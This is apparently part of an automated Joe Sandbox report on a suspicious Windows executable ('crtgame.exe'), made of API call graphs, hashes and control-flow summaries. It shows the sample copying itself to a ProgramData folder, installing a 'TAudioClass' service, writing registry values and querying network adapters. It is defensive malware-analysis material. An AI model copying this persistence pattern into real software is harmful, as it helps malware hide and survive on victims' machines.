                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 1458359878-0
                                                                                                            • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                                            • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                                                            • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                                            • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:21.9%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:13.3%
                                                                                                            Total number of Nodes:400
                                                                                                            Total number of Limit Nodes:7
                                                                                                            execution_graph 2442 404b40 2445 404b48 2442->2445 2443 404bda 2445->2443 2446 404a50 RtlUnwind 2445->2446 2447 404a68 2446->2447 2447->2445 2014 402f82 GetVersion 2039 4032ba HeapCreate 2014->2039 2016 402fe1 2017 402fe6 2016->2017 2018 402fee 2016->2018 2137 40309d 2017->2137 2051 4048a2 2018->2051 2022 402ff6 GetCommandLineA 2065 404770 2022->2065 2026 403010 2097 40446a 2026->2097 2028 403015 2029 40301a GetStartupInfoA 2028->2029 2110 404412 2029->2110 2031 40302c GetModuleHandleA 2114 4026f0 GetModuleHandleA GetModuleFileNameA 2031->2114 2034 403050 2143 4041b9 2034->2143 2040 403310 2039->2040 2041 4032da 2039->2041 2040->2016 2150 403172 2041->2150 2044 4032e9 2162 403317 HeapAlloc 2044->2162 2046 403313 2046->2016 2047 4032f6 2047->2046 2164 403b68 2047->2164 2048 4032f3 2048->2046 2050 403304 HeapDestroy 2048->2050 2050->2040 2227 402ed0 2051->2227 2054 4048c1 GetStartupInfoA 2062 4049d2 2054->2062 2064 40490d 2054->2064 2057 404a39 SetHandleCount 2057->2022 2058 4049f9 GetStdHandle 2060 404a07 GetFileType 2058->2060 2058->2062 2059 402ed0 12 API calls 2059->2064 2060->2062 2061 40497e 2061->2062 2063 4049a0 GetFileType 2061->2063 2062->2057 2062->2058 2063->2061 2064->2059 2064->2061 2064->2062 2066 40478b GetEnvironmentStringsW 2065->2066 2067 4047be 2065->2067 2068 404793 2066->2068 2069 40479f GetEnvironmentStrings 2066->2069 2067->2068 2070 4047af 2067->2070 2071 4047d7 WideCharToMultiByte 2068->2071 2072 4047cb GetEnvironmentStringsW 2068->2072 2069->2070 2073 403006 2069->2073 2070->2073 2074 404851 GetEnvironmentStrings 2070->2074 2075 40485d 2070->2075 2077 40480b 2071->2077 2078 40483d FreeEnvironmentStringsW 2071->2078 2072->2071 2072->2073 2088 404523 2073->2088 2074->2073 2074->2075 2079 402ed0 12 API calls 2075->2079 2080 402ed0 12 API calls 2077->2080 2078->2073 2086 404878 2079->2086 2081 404811 2080->2081 2081->2078 2082 40481a WideCharToMultiByte 2081->2082 2084 404834 2082->2084 2085 40482b 2082->2085 2083 40488e FreeEnvironmentStringsA 2083->2073 2084->2078 2293 4030c1 2085->2293 2086->2083 2089 404535 2088->2089 2090 40453a GetModuleFileNameA 2088->2090 2323 40589b 2089->2323 2092 40455d 2090->2092 2093 402ed0 12 API calls 2092->2093 2094 40457e 2093->2094 2095 40458e 2094->2095 2096 403078 7 API calls 2094->2096 2095->2026 2096->2095 2098 404477 2097->2098 2100 40447c 2097->2100 2099 40589b 19 API calls 2098->2099 2099->2100 2101 402ed0 12 API calls 2100->2101 2102 4044a9 2101->2102 2103 403078 7 API calls 2102->2103 2109 4044bd 2102->2109 2103->2109 2104 404500 2105 4030c1 7 API calls 2104->2105 2106 40450c 2105->2106 2106->2028 2107 402ed0 12 API calls 2107->2109 2108 403078 7 API calls 2108->2109 2109->2104 2109->2107 2109->2108 2111 40441b 2110->2111 2113 404420 2110->2113 2112 40589b 19 API calls 2111->2112 2112->2113 2113->2031 2347 402de0 2114->2347 2119 402776 lstrcmpiW 2121 4027ed lstrcmpiW 2119->2121 2126 402788 2119->2126 2120 40295b StartServiceCtrlDispatcherA 2120->2034 2122 402805 2121->2122 2123 40289c lstrcmpiW 2121->2123 2353 402548 2122->2353 2123->2120 2124 4028ae RegCreateKeyExA 2123->2124 2127 4028d0 2124->2127 2128 40292f SetEvent CreateThread WaitForSingleObject ExitProcess 2124->2128 2126->2120 2130 4027a7 2126->2130 2133 4027e8 2126->2133 2132 4028e2 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2127->2132 2410 402351 2128->2410 2135 4027bc CreateFileA CloseHandle ExitProcess 2130->2135 2131 402812 RegCreateKeyExA 2131->2120 2134 402838 2131->2134 2132->2128 2133->2120 2136 40284a GetTickCount wsprintfA RegSetValueExA RegCloseKey 2134->2136 2136->2120 2138 4030a6 2137->2138 2139 4030ab 2137->2139 2141 404c20 7 API calls 2138->2141 2140 404c59 7 API calls 2139->2140 2142 4030b4 ExitProcess 2140->2142 2141->2139 2432 4041db 2143->2432 2146 40428e 2147 40429a 2146->2147 2148 4043c3 UnhandledExceptionFilter 2147->2148 2149 40306a 2147->2149 2148->2149 2173 402db0 2150->2173 2153 4031b5 GetEnvironmentVariableA 2155 403292 2153->2155 2158 4031d4 2153->2158 2154 40319b 2154->2153 2156 4031ad 2154->2156 2155->2156 2178 403145 GetModuleHandleA 2155->2178 2156->2044 2156->2047 2159 403219 GetModuleFileNameA 2158->2159 2160 403211 2158->2160 2159->2160 2160->2155 2175 404dac 2160->2175 2163 403333 2162->2163 2163->2048 2165 403b75 2164->2165 2166 403b7c HeapAlloc 2164->2166 2167 403b99 VirtualAlloc 2165->2167 2166->2167 2168 403bd1 2166->2168 2169 403bb9 VirtualAlloc 2167->2169 2170 403c8e 2167->2170 2168->2048 2169->2168 2171 403c80 VirtualFree 2169->2171 2170->2168 2172 403c96 HeapFree 2170->2172 2171->2170 2172->2168 2174 402dbc GetVersionExA 2173->2174 2174->2153 2174->2154 2180 404dc3 2175->2180 2179 40315c 2178->2179 2179->2156 2182 404ddb 2180->2182 2185 404e0b 2182->2185 2187 405b0a 2182->2187 2183 404dbf 2183->2155 2184 405b0a 6 API calls 2184->2185 2185->2183 2185->2184 2191 405a3e 2185->2191 2188 405b28 2187->2188 2190 405b1c 2187->2190 2197 405dce 2188->2197 2190->2182 2192 405a4c 2191->2192 2193 405a69 2191->2193 2192->2185 2194 405a85 2193->2194 2195 405b0a 6 API calls 2193->2195 2194->2192 2209 405b7f 2194->2209 2195->2194 2198 405e17 2197->2198 2199 405dff GetStringTypeW 2197->2199 2201 405e42 GetStringTypeA 2198->2201 2203 405e66 2198->2203 2199->2198 2200 405e1b GetStringTypeA 2199->2200 2200->2198 2204 405f03 2200->2204 2201->2204 2203->2204 2205 405e7c MultiByteToWideChar 2203->2205 2204->2190 2205->2204 2206 405ea0 2205->2206 2206->2204 2207 405eda MultiByteToWideChar 2206->2207 2207->2204 2208 405ef3 GetStringTypeW 2207->2208 2208->2204 2210 405bcb 2209->2210 2211 405baf LCMapStringW 2209->2211 2213 405c31 2210->2213 2214 405c14 LCMapStringA 2210->2214 2211->2210 2212 405bd3 LCMapStringA 2211->2212 2212->2210 2221 405d0d 2212->2221 2215 405c47 MultiByteToWideChar 2213->2215 2213->2221 2214->2221 2216 405c71 2215->2216 2215->2221 2217 405ca7 MultiByteToWideChar 2216->2217 2216->2221 2218 405cc0 LCMapStringW 2217->2218 2217->2221 2219 405cdb 2218->2219 2218->2221 2220 405ce1 2219->2220 2223 405d21 2219->2223 2220->2221 2222 405cef LCMapStringW 2220->2222 2221->2192 2222->2221 2223->2221 2224 405d59 LCMapStringW 2223->2224 2224->2221 2225 405d71 WideCharToMultiByte 2224->2225 2225->2221 2236 402ee2 2227->2236 2230 403078 2231 403081 2230->2231 2232 403086 2230->2232 2273 404c20 2231->2273 2279 404c59 2232->2279 2237 402edf 2236->2237 2239 402ee9 2236->2239 2237->2054 2237->2230 2239->2237 2240 402f0e 2239->2240 2241 402f1d 2240->2241 2244 402f32 2240->2244 2248 402f2b 2241->2248 2249 4036b3 2241->2249 2243 402f71 HeapAlloc 2245 402f80 2243->2245 2244->2243 2244->2248 2255 403e60 2244->2255 2245->2239 2246 402f30 2246->2239 2248->2243 2248->2245 2248->2246 2252 4036e5 2249->2252 2250 403793 2250->2248 2252->2250 2254 403784 2252->2254 2262 4039bc 2252->2262 2254->2250 2269 403a6d 2254->2269 2256 403e6e 2255->2256 2257 403f5a VirtualAlloc 2256->2257 2258 40402f 2256->2258 2261 403f2b 2256->2261 2257->2261 2259 403b68 5 API calls 2258->2259 2259->2261 2261->2248 2263 4039ff HeapAlloc 2262->2263 2264 4039cf HeapReAlloc 2262->2264 2266 403a4f 2263->2266 2267 403a25 VirtualAlloc 2263->2267 2265 4039ee 2264->2265 2264->2266 2265->2263 2266->2254 2267->2266 2268 403a3f HeapFree 2267->2268 2268->2266 2270 403a7f 2269->2270 2270->2270 2271 403aa9 VirtualAlloc 2270->2271 2272 403ac8 2271->2272 2272->2250 2274 404c2a 2273->2274 2275 404c57 2274->2275 2276 404c59 7 API calls 2274->2276 2275->2232 2277 404c41 2276->2277 2278 404c59 7 API calls 2277->2278 2278->2275 2282 404c6c 2279->2282 2280 40308f 2280->2054 2281 404d83 2285 404d96 GetStdHandle WriteFile 2281->2285 2282->2280 2282->2281 2283 404cac 2282->2283 2283->2280 2284 404cb8 GetModuleFileNameA 2283->2284 2286 404cd0 2284->2286 2285->2280 2288 4058b7 2286->2288 2289 4058c4 LoadLibraryA 2288->2289 2292 405906 2288->2292 2290 4058d5 GetProcAddress 2289->2290 2289->2292 2291 4058ec GetProcAddress GetProcAddress 2290->2291 2290->2292 2291->2292 2292->2280 2294 4030cd 2293->2294 2302 4030e9 2293->2302 2295 4030d7 2294->2295 2296 4030ed 2294->2296 2298 403119 HeapFree 2295->2298 2299 4030e3 2295->2299 2297 403118 2296->2297 2301 403107 2296->2301 2297->2298 2298->2302 2304 40338a 2299->2304 2310 403e1b 2301->2310 2302->2084 2305 4033c8 2304->2305 2309 40367e 2304->2309 2306 4035c4 VirtualFree 2305->2306 2305->2309 2307 403628 2306->2307 2308 403637 VirtualFree HeapFree 2307->2308 2307->2309 2308->2309 2309->2302 2311 403e48 2310->2311 2312 403e5e 2310->2312 2311->2312 2314 403d02 2311->2314 2312->2302 2317 403d0f 2314->2317 2315 403dbf 2315->2312 2316 403d30 VirtualFree 2316->2317 2317->2315 2317->2316 2319 403cac VirtualFree 2317->2319 2320 403cc9 2319->2320 2321 403cf9 2320->2321 2322 403cd9 HeapFree 2320->2322 2321->2317 2322->2317 2324 4058a4 2323->2324 2325 4058ab 2323->2325 2327 4054d7 2324->2327 2325->2090 2334 405670 2327->2334 2329 405664 2329->2325 2332 40551a GetCPInfo 2333 40552e 2332->2333 2333->2329 2339 405716 GetCPInfo 2333->2339 2335 405690 2334->2335 2336 405680 GetOEMCP 2334->2336 2337 405695 GetACP 2335->2337 2338 4054e8 2335->2338 2336->2335 2337->2338 2338->2329 2338->2332 2338->2333 2340 405739 2339->2340 2346 405801 2339->2346 2341 405dce 6 API calls 2340->2341 2342 4057b5 2341->2342 2343 405b7f 9 API calls 2342->2343 2344 4057d9 2343->2344 2345 405b7f 9 API calls 2344->2345 2345->2346 2346->2329 2348 40273c GetCommandLineW CommandLineToArgvW GetLocalTime 2347->2348 2349 401fbe 2348->2349 2350 401fd3 2349->2350 2372 401a1d 2350->2372 2352 401fdc 2352->2119 2352->2120 2354 402569 2353->2354 2355 402576 GetModuleHandleA GetModuleFileNameA 2354->2355 2356 402ed0 12 API calls 2355->2356 2357 402595 2356->2357 2358 402ed0 12 API calls 2357->2358 2359 4025a6 2358->2359 2360 4025db GetModuleHandleA GetModuleFileNameW RegOpenKeyExA 2359->2360 2361 4026d6 2360->2361 2362 402616 RegQueryValueExA 2360->2362 2361->2120 2361->2131 2362->2361 2363 402640 RegCloseKey 2362->2363 2364 402654 2363->2364 2365 402660 CreateDirectoryA 2364->2365 2366 402676 2365->2366 2367 402688 CopyFileA 2366->2367 2367->2361 2368 40269e OpenSCManagerA 2367->2368 2368->2361 2369 4026af CreateServiceA 2368->2369 2370 4026dd CloseServiceHandle CloseServiceHandle 2369->2370 2371 4026cd CloseServiceHandle 2369->2371 2370->2361 2371->2361 2373 401a2c 2372->2373 2380 401a58 CreateFileA 2373->2380 2379 401a47 2379->2352 2381 401a35 2380->2381 2383 401a86 2380->2383 2388 401b54 LoadLibraryA 2381->2388 2382 401aa1 DeviceIoControl 2382->2383 2383->2382 2385 401b43 CloseHandle 2383->2385 2386 401b17 GetLastError 2383->2386 2400 402d16 2383->2400 2403 402d08 2383->2403 2385->2381 2386->2383 2386->2385 2389 401b77 GetProcAddress 2388->2389 2390 401a3e 2388->2390 2391 401c21 FreeLibrary 2389->2391 2393 401b8e 2389->2393 2397 401c2f 2390->2397 2391->2390 2392 401b9e GetAdaptersInfo 2392->2393 2393->2392 2394 402d16 7 API calls 2393->2394 2395 401c1e 2393->2395 2396 402d08 12 API calls 2393->2396 2394->2393 2395->2391 2396->2393 2406 401c5b GetWindowsDirectoryA 2397->2406 2399 401c3e 2399->2379 2401 4030c1 7 API calls 2400->2401 2402 402d1f 2401->2402 2402->2383 2404 402ee2 12 API calls 2403->2404 2405 402d13 2404->2405 2405->2383 2407 401cb7 2406->2407 2408 401c7e CreateFileA 2406->2408 2407->2399 2408->2407 2409 401ca2 GetFileTime CloseHandle 2408->2409 2409->2407 2411 402362 WaitForSingleObject 2410->2411 2412 402368 2411->2412 2413 4023cc 2411->2413 2414 4023b1 Sleep 2412->2414 2417 4021c6 VirtualAlloc 2412->2417 2424 401ffb FindResourceA 2412->2424 2414->2411 2422 4021f8 2417->2422 2418 40230a 2420 402331 Sleep 2418->2420 2419 402293 GetLastError LoadLibraryExA 2419->2422 2421 402347 2420->2421 2421->2412 2422->2418 2422->2419 2423 4022dc GetProcAddress 2422->2423 2423->2422 2425 40201d GetLastError SizeofResource 2424->2425 2427 402036 2424->2427 2426 40203d LoadResource LockResource GlobalAlloc 2425->2426 2425->2427 2428 402069 2426->2428 2427->2412 2429 402092 GetTickCount 2428->2429 2431 40209c GlobalAlloc 2429->2431 2431->2427 2433 4041e7 GetCurrentProcess TerminateProcess 2432->2433 2434 4041f8 2432->2434 2433->2434 2435 403059 2434->2435 2436 404262 ExitProcess 2434->2436 2435->2146 2463 4023d3 2464 402425 2463->2464 2465 4023da 2463->2465 2465->2464 2466 4023e5 GetLastError SetServiceStatus SetEvent 2465->2466 2466->2464 2467 405c93 2468 405ca2 2467->2468 2469 405ca7 MultiByteToWideChar 2468->2469 2470 405d0d 2468->2470 2469->2470 2471 405cc0 LCMapStringW 2469->2471 2471->2470 2472 405cdb 2471->2472 2473 405ce1 2472->2473 2475 405d21 2472->2475 2473->2470 2474 405cef LCMapStringW 2473->2474 2474->2470 2475->2470 2476 405d59 LCMapStringW 2475->2476 2476->2470 2477 405d71 WideCharToMultiByte 2476->2477 2477->2470 2448 405d47 2449 405d55 2448->2449 2450 405d59 LCMapStringW 2449->2450 2451 405d0d 2449->2451 2450->2451 2452 405d71 WideCharToMultiByte 2450->2452 2452->2451 2454 404b48 2455 404bda 2454->2455 2457 404b66 2454->2457 2456 404a50 RtlUnwind 2456->2457 2457->2455 2457->2456 2479 402428 RegisterServiceCtrlHandlerA 2480 402541 2479->2480 2481 40244b 2479->2481 2482 402459 SetServiceStatus GetLastError CreateEventA 2481->2482 2483 4024d2 SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2482->2483 2484 4024b3 GetLastError 2482->2484 2485 402538 SetServiceStatus 2483->2485 2484->2485 2485->2480 2437 4041db 2438 4041e7 GetCurrentProcess TerminateProcess 2437->2438 2439 4041f8 2437->2439 2438->2439 2440 404272 2439->2440 2441 404262 ExitProcess 2439->2441 2458 405ecb 2459 405ed2 2458->2459 2460 405f03 2459->2460 2461 405eda MultiByteToWideChar 2459->2461 2461->2460 2462 405ef3 GetStringTypeW 2461->2462 2462->2460 2486 40306d 2493 4041ca 2486->2493 2488 403078 2489 403086 2488->2489 2490 404c20 7 API calls 2488->2490 2491 404c59 7 API calls 2489->2491 2490->2489 2492 40308f 2491->2492 2494 4041db 3 API calls 2493->2494 2495 4041d7 2494->2495 2495->2488

                                                                                                            Callgraph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            • Opacity -> Relevance
                                                                                                            • Disassembly available
                                                                                                            callgraph 0 Function_00405940 1 Function_00404B40 7 Function_00404A50 1->7 54 Function_00404B26 1->54 99 Function_00404A92 1->99 2 Function_00405D43 3 Function_00403145 4 Function_00405D47 5 Function_00404B48 5->7 5->54 5->99 6 Function_00402548 74 Function_00402ED0 6->74 81 Function_00402DE0 6->81 87 Function_00402DF0 6->87 111 Function_00402CB0 6->111 8 Function_00401051 9 Function_00402351 67 Function_004021C6 9->67 88 Function_00401FF7 9->88 90 Function_00401FFB 9->90 10 Function_00401B54 37 Function_00402D08 10->37 44 Function_00402D16 10->44 60 Function_00402D30 10->60 71 Function_004018CC 10->71 11 Function_00401A58 11->37 11->44 11->60 11->71 12 Function_00404C59 12->0 12->60 12->81 12->87 115 Function_004058B7 12->115 13 Function_00401C5B 14 Function_0040335F 15 Function_00405160 16 Function_00403E60 18 Function_00403B68 16->18 19 Function_00404068 16->19 16->111 17 Function_00404A68 18->111 20 Function_00405369 21 Function_0040446A 30 Function_00403078 21->30 21->60 64 Function_004030C1 21->64 21->74 21->81 102 Function_0040589B 21->102 22 Function_0040306D 22->12 51 Function_00404C20 22->51 69 Function_004041CA 22->69 23 Function_00403A6D 24 Function_00404A70 25 Function_00402970 26 Function_00404770 26->25 26->64 26->74 27 Function_00405670 28 Function_00403172 28->3 50 Function_00405120 28->50 80 Function_00404FE0 28->80 104 Function_004050A0 28->104 109 Function_00404DAC 28->109 112 Function_00402DB0 28->112 29 Function_00404274 30->12 30->51 31 Function_00405378 32 Function_00405B7F 107 Function_00405DA3 32->107 32->112 33 Function_00401000 34 Function_0040A400 35 Function_00403D02 110 Function_00403CAC 35->110 36 Function_00404C05 36->99 82 Function_00402EE2 37->82 38 Function_0040A408 39 Function_00405B0A 72 Function_00405DCE 39->72 40 Function_00402A0C 41 Function_00402F0E 41->16 114 Function_004036B3 41->114 42 Function_00404412 101 Function_00405495 42->101 42->102 43 Function_00405716 43->32 43->72 44->64 45 Function_00403317 46 Function_00403E1B 46->35 47 Function_00401A1D 47->10 47->11 56 Function_00401029 47->56 59 Function_00401C2F 47->59 93 Function_00401982 47->93 48 Function_00404B1D 49 Function_0040531E 51->12 52 Function_00405220 53 Function_00404523 53->30 53->74 53->102 120 Function_004045BC 53->120 55 Function_00402428 55->111 57 Function_0040312A 58 Function_00402B2E 59->13 59->71 61 Function_00402A30 62 Function_00402132 63 Function_00405A3E 63->32 63->39 64->14 64->46 66 Function_00403DC4 64->66 95 Function_0040338A 64->95 65 Function_00404DC3 65->39 65->63 67->25 67->62 67->111 68 Function_00405EC7 79 Function_004041DB 69->79 70 Function_00405ECB 71->8 71->25 71->33 72->111 72->112 73 Function_004043CF 74->82 75 Function_004023D3 76 Function_004092D3 77 Function_00404FD5 78 Function_004054D7 78->27 78->43 85 Function_004056ED 78->85 118 Function_004056BA 78->118 79->29 82->41 82->57 83 Function_004051E5 84 Function_00402DE7 86 Function_004026F0 86->6 86->9 86->60 86->81 86->87 86->111 122 Function_00401FBE 86->122 89 Function_00404AFA 90->25 121 Function_00401CBD 90->121 91 Function_004051FC 92 Function_00402F82 92->21 92->26 92->42 92->53 92->86 96 Function_0040418C 92->96 97 Function_0040428E 92->97 103 Function_0040309D 92->103 106 Function_004048A2 92->106 116 Function_004041B9 92->116 117 Function_004032BA 92->117 93->8 93->25 93->33 93->111 94 Function_00402B88 95->15 96->29 97->73 98 Function_00405C8F 99->54 100 Function_00405C93 100->112 108 Function_004054A6 101->108 102->78 103->12 103->51 105 Function_004053A0 106->30 106->74 109->65 113 Function_00402BB0 114->23 119 Function_004039BC 114->119 116->79 117->18 117->28 117->45 122->47 122->111

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
                                                                                                            • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
                                                                                                            • GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
                                                                                                            • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
                                                                                                            • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
                                                                                                            • ExitProcess.KERNEL32 ref: 004027D9
                                                                                                            • lstrcmpiW.KERNEL32(?,00407108,?,00000000), ref: 004027FB
                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\TLGraphicsMode,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
                                                                                                            • GetTickCount.KERNEL32 ref: 0040284D
                                                                                                            • wsprintfA.USER32 ref: 00402865
                                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00402891
                                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040295F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                                                            • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\TLGraphicsMode$TAudioClass$TAudioClass$tac1210%d$test
                                                                                                            • API String ID: 99468869-594702758
                                                                                                            • Opcode ID: 1774414c222657f30e0ff0fda0a7ecf03fc2325e43c918c94e521cb7f69dc8be
                                                                                                            • Instruction ID: 4fae6dedbb5559179aee60a5bd746ea385fcb214e20c208df2d3a45f8cd54b52
                                                                                                            • Opcode Fuzzy Hash: 1774414c222657f30e0ff0fda0a7ecf03fc2325e43c918c94e521cb7f69dc8be
                                                                                                            • Instruction Fuzzy Hash: C76132B1940219BFEB10DBA19E4DFAE7BBCEB04349F104176B606F21D1D7789D148B68

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,74DEF360,00000000), ref: 00402582
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,74DEF360,00000000), ref: 00402589
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360), ref: 004025EA
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 004025F1
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
                                                                                                            • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\TAudioClass\TAudioClass.exe,?), ref: 00402632
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,74DEF360,00000000), ref: 00402643
                                                                                                            • CreateDirectoryA.KERNELBASE(C:\ProgramData\TAudioClass\TAudioClass.exe,00000000), ref: 00402665
                                                                                                            • CopyFileA.KERNEL32(?,C:\ProgramData\TAudioClass\TAudioClass.exe,00000000), ref: 00402694
                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
                                                                                                            • CreateServiceA.ADVAPI32(00000000,TAudioClass,TAudioClass,000F01FF,00000010,00000002,00000001,C:\ProgramData\TAudioClass\TAudioClass.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                                                            • String ID: .exe$C:\ProgramData\TAudioClass\TAudioClass.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$TAudioClass
                                                                                                            • API String ID: 3461818117-1310459540
                                                                                                            • Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                                                            • Instruction ID: ab6d53e788ee7b1a4f89e64ab78f532d797b3e843243f72342cd50906d5f4c6a
                                                                                                            • Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                                                            • Instruction Fuzzy Hash: A541B6B1940108BBEB20AB61DE4EE9F3B6DEF41745F00043AF601B11D2D7B95D509A7D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 63 401b54-401b71 LoadLibraryA 64 401b77-401b88 GetProcAddress 63->64 65 401c2a-401c2e 63->65 66 401c21-401c24 FreeLibrary 64->66 67 401b8e-401b97 64->67 66->65 68 401b9e-401bae GetAdaptersInfo 67->68 69 401bb0-401bb9 68->69 70 401be4-401bec 68->70 71 401bca-401be0 call 402d30 call 4018cc 69->71 72 401bbb-401bbf 69->72 73 401bf5-401bf9 70->73 74 401bee-401bf4 call 402d16 70->74 71->70 72->70 75 401bc1-401bc8 72->75 78 401bfb-401bff 73->78 79 401c1e-401c20 73->79 74->73 75->71 75->72 78->79 82 401c01-401c04 78->82 79->66 84 401c06-401c0c 82->84 85 401c0f-401c1c call 402d08 82->85 84->85 85->68 85->79
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                            • API String ID: 514930453-3667123677
                                                                                                            • Opcode ID: fe97a66bfe1a0e4a090fceeb56766dae8f1332a0d6ba4185a88c48e8e01133b6
                                                                                                            • Instruction ID: a5aee0b79a35ee34078b30f54a7b4ada864a53d9b06d06d0c5030cf98c67091c
                                                                                                            • Opcode Fuzzy Hash: fe97a66bfe1a0e4a090fceeb56766dae8f1332a0d6ba4185a88c48e8e01133b6
                                                                                                            • Instruction Fuzzy Hash: 3121A770944209AFDF21DBA5C9447EFBBB4EF41344F1440BAE504B22E1E7789A85CB69

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
